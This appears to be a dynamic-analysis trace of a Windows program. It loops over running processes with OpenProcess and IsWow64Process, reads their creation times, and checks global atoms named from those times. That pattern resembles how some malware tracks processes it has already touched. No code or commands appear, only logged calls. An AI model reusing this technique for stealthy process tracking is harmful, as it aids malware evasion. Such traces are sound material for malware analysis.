	[0091.231] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.231] CloseHandle (hObject=0x20c) returned 1
	[0091.231] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x20c
	[0091.231] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.231] CloseHandle (hObject=0x20c) returned 1
	[0091.231] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x20c
	[0091.231] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.231] CloseHandle (hObject=0x20c) returned 1
	[0091.231] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x20c
	[0091.231] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.231] CloseHandle (hObject=0x20c) returned 1
	[0091.232] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x20c
	[0091.232] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.232] CloseHandle (hObject=0x20c) returned 1
	[0091.232] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x20c
	[0091.232] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.232] CloseHandle (hObject=0x20c) returned 1
	[0091.232] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x20c
	[0091.232] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.232] CloseHandle (hObject=0x20c) returned 1
	[0091.232] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x20c
	[0091.232] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.232] CloseHandle (hObject=0x20c) returned 1
	[0091.232] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x20c
	[0091.232] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.232] CloseHandle (hObject=0x20c) returned 1
	[0091.232] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x20c
	[0091.233] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0091.233] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0091.233] GetProcessTimes (in: hProcess=0x20c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0091.233] wsprintfA (in: param_1=0x6488a8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0091.233] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0091.233] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0091.233] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0091.233] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0091.234] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0091.234] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0091.234] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0091.234] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0091.234] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0091.234] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x20c
	[0091.234] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.234] CloseHandle (hObject=0x20c) returned 1
	[0091.234] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x20c
	[0091.234] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.234] CloseHandle (hObject=0x20c) returned 1
	[0091.308] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0091.308] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0091.308] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0091.308] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0091.308] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0091.308] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0091.309] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0091.309] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0091.309] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0091.309] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0091.309] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0091.309] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0091.309] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0091.310] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0091.310] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0091.310] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0091.310] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0091.310] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0091.310] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x20c
	[0091.310] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.310] CloseHandle (hObject=0x20c) returned 1
	[0091.310] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0091.311] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0091.311] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x20c
	[0091.311] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.311] CloseHandle (hObject=0x20c) returned 1
	[0091.311] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0091.311] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x20c
	[0091.311] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.311] CloseHandle (hObject=0x20c) returned 1
	[0091.311] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x20c
	[0091.311] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.311] CloseHandle (hObject=0x20c) returned 1
	[0091.311] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x20c
	[0091.311] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.311] CloseHandle (hObject=0x20c) returned 1
	[0091.312] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x20c
	[0091.312] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.312] CloseHandle (hObject=0x20c) returned 1
	[0091.312] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x20c
	[0091.312] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.312] CloseHandle (hObject=0x20c) returned 1
	[0091.312] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x20c
	[0091.312] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.312] CloseHandle (hObject=0x20c) returned 1
	[0091.312] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0091.312] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x20c
	[0091.312] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.312] CloseHandle (hObject=0x20c) returned 1
	[0091.312] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x20c
	[0091.312] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.312] CloseHandle (hObject=0x20c) returned 1
	[0091.313] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x20c
	[0091.313] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.313] CloseHandle (hObject=0x20c) returned 1
	[0091.313] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x20c
	[0091.313] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.313] CloseHandle (hObject=0x20c) returned 1
	[0091.313] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x20c
	[0091.313] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.313] CloseHandle (hObject=0x20c) returned 1
	[0091.313] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x20c
	[0091.313] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.313] CloseHandle (hObject=0x20c) returned 1
	[0091.313] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x20c
	[0091.313] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.313] CloseHandle (hObject=0x20c) returned 1
	[0091.313] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x20c
	[0091.314] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.314] CloseHandle (hObject=0x20c) returned 1
	[0091.314] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x20c
	[0091.314] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.314] CloseHandle (hObject=0x20c) returned 1
	[0091.314] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x20c
	[0091.314] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.314] CloseHandle (hObject=0x20c) returned 1
	[0091.314] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x20c
	[0091.314] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.314] CloseHandle (hObject=0x20c) returned 1
	[0091.314] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x20c
	[0091.314] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.314] CloseHandle (hObject=0x20c) returned 1
	[0091.314] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x20c
	[0091.314] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.314] CloseHandle (hObject=0x20c) returned 1
	[0091.315] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x20c
	[0091.315] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.315] CloseHandle (hObject=0x20c) returned 1
	[0091.315] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x20c
	[0091.315] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.315] CloseHandle (hObject=0x20c) returned 1
	[0091.315] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x20c
	[0091.315] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.315] CloseHandle (hObject=0x20c) returned 1
	[0091.315] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x20c
	[0091.315] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.315] CloseHandle (hObject=0x20c) returned 1
	[0091.315] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x20c
	[0091.315] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.315] CloseHandle (hObject=0x20c) returned 1
	[0091.315] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x20c
	[0091.315] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.316] CloseHandle (hObject=0x20c) returned 1
	[0091.316] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x20c
	[0091.316] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.316] CloseHandle (hObject=0x20c) returned 1
	[0091.316] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x20c
	[0091.316] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.316] CloseHandle (hObject=0x20c) returned 1
	[0091.316] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x20c
	[0091.316] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.316] CloseHandle (hObject=0x20c) returned 1
	[0091.316] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x20c
	[0091.316] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.316] CloseHandle (hObject=0x20c) returned 1
	[0091.316] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x20c
	[0091.317] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0091.317] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0091.317] GetProcessTimes (in: hProcess=0x20c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0091.317] wsprintfA (in: param_1=0x6488a8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0091.317] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0091.317] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0091.317] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0091.318] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0091.318] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0091.318] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0091.318] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0091.318] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0091.318] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0091.318] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x20c
	[0091.318] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.318] CloseHandle (hObject=0x20c) returned 1
	[0091.318] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x20c
	[0091.318] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.318] CloseHandle (hObject=0x20c) returned 1
	[0091.392] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0091.392] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0091.392] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0091.392] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0091.392] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0091.393] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0091.393] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0091.393] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0091.393] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0091.393] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0091.393] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0091.393] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0091.393] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0091.393] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0091.394] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0091.394] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0091.394] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0091.394] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0091.394] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x20c
	[0091.394] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.394] CloseHandle (hObject=0x20c) returned 1
	[0091.394] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0091.394] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0091.394] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x20c
	[0091.394] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.394] CloseHandle (hObject=0x20c) returned 1
	[0091.395] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0091.395] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x20c
	[0091.395] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.395] CloseHandle (hObject=0x20c) returned 1
	[0091.395] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x20c
	[0091.395] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.395] CloseHandle (hObject=0x20c) returned 1
	[0091.395] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x20c
	[0091.395] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.395] CloseHandle (hObject=0x20c) returned 1
	[0091.395] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x20c
	[0091.395] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.395] CloseHandle (hObject=0x20c) returned 1
	[0091.395] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x20c
	[0091.395] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.395] CloseHandle (hObject=0x20c) returned 1
	[0091.396] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x20c
	[0091.396] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.396] CloseHandle (hObject=0x20c) returned 1
	[0091.396] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0091.396] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x20c
	[0091.396] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.396] CloseHandle (hObject=0x20c) returned 1
	[0091.396] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x20c
	[0091.396] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.396] CloseHandle (hObject=0x20c) returned 1
	[0091.396] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x20c
	[0091.396] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.396] CloseHandle (hObject=0x20c) returned 1
	[0091.397] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x20c
	[0091.397] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.397] CloseHandle (hObject=0x20c) returned 1
	[0091.397] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x20c
	[0091.397] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.397] CloseHandle (hObject=0x20c) returned 1
	[0091.397] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x20c
	[0091.397] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.397] CloseHandle (hObject=0x20c) returned 1
	[0091.397] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x20c
	[0091.397] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.397] CloseHandle (hObject=0x20c) returned 1
	[0091.397] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x20c
	[0091.397] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.397] CloseHandle (hObject=0x20c) returned 1
	[0091.398] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x20c
	[0091.398] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.398] CloseHandle (hObject=0x20c) returned 1
	[0091.398] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x20c
	[0091.398] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.398] CloseHandle (hObject=0x20c) returned 1
	[0091.398] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x20c
	[0091.398] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.398] CloseHandle (hObject=0x20c) returned 1
	[0091.398] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x20c
	[0091.398] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.398] CloseHandle (hObject=0x20c) returned 1
	[0091.398] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x20c
	[0091.398] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.399] CloseHandle (hObject=0x20c) returned 1
	[0091.399] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x20c
	[0091.399] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.399] CloseHandle (hObject=0x20c) returned 1
	[0091.399] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x20c
	[0091.399] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.399] CloseHandle (hObject=0x20c) returned 1
	[0091.399] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x20c
	[0091.399] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.399] CloseHandle (hObject=0x20c) returned 1
	[0091.399] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x20c
	[0091.399] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.399] CloseHandle (hObject=0x20c) returned 1
	[0091.399] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x20c
	[0091.399] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.399] CloseHandle (hObject=0x20c) returned 1
	[0091.400] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x20c
	[0091.400] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.400] CloseHandle (hObject=0x20c) returned 1
	[0091.400] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x20c
	[0091.400] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.400] CloseHandle (hObject=0x20c) returned 1
	[0091.400] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x20c
	[0091.400] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0091.400] CloseHandle (hObject=0x20c) returned 1
